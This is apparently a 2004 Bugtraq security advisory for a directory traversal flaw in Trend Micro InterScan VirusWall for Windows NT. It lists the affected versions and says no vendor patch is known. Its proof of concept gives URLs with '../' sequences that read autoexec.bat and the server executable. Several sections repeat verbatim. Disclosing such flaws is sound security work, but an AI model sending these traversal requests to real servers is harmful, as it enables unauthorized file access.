Trend Micro Interscan Viruswall localweb Directory Traversal Vulnerability
BID:9966
Info
Trend Micro Interscan Viruswall localweb Directory Traversal Vulnerability
| Bugtraq ID: | 9966 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 24 2004 12:00AM |
| Updated: | Mar 24 2004 12:00AM |
| Credit: | Discovery is credited to Tri Huynh <[email protected]>. |
| Vulnerable: |
Trend Micro InterScan VirusWall for Windows NT 3.52 build 1466 Trend Micro InterScan VirusWall for Windows NT 3.52 Trend Micro InterScan VirusWall for Windows NT 3.51 Trend Micro InterScan VirusWall for Windows NT 3.6 Trend Micro InterScan VirusWall for Windows NT 3.5 Trend Micro InterScan VirusWall for Windows NT 3.4 |
| Not Vulnerable: | |
Discussion
Trend Micro Interscan Viruswall localweb Directory Traversal Vulnerability
It has been reported that InterScan VirusWall may to a directory traversal vulnerability that may allow an attacker to request files from the '/ishttp/localweb' directory and any sub directories of 'localweb' with directory traversal strings such as '../'.
It has been reported that InterScan VirusWall may to a directory traversal vulnerability that may allow an attacker to request files from the '/ishttp/localweb' directory and any sub directories of 'localweb' with directory traversal strings such as '../'.
Exploit / POC
Trend Micro Interscan Viruswall localweb Directory Traversal Vulnerability
No exploit is required.
The following proof of concept has been provided:
http://www.example.com/ishttpd/localweb/filename
http://www.example.com/ishttpd/localweb/java/?/../../../../../../../../autoexec.bat
http://www.example.com/ishttpd/localweb/java/?/../../../ishttpd.exe
No exploit is required.
The following proof of concept has been provided:
http://www.example.com/ishttpd/localweb/filename
http://www.example.com/ishttpd/localweb/java/?/../../../../../../../../autoexec.bat
http://www.example.com/ishttpd/localweb/java/?/../../../ishttpd.exe
Solution / Fix
Trend Micro Interscan Viruswall localweb Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Trend Micro Interscan Viruswall localweb Directory Traversal Vulnerability
References:
References:
- Trend Micro Homepage (Trend Micro)
- TrendMacro Interscan Viruswall Directory Traversal ("Tri Huynh"
)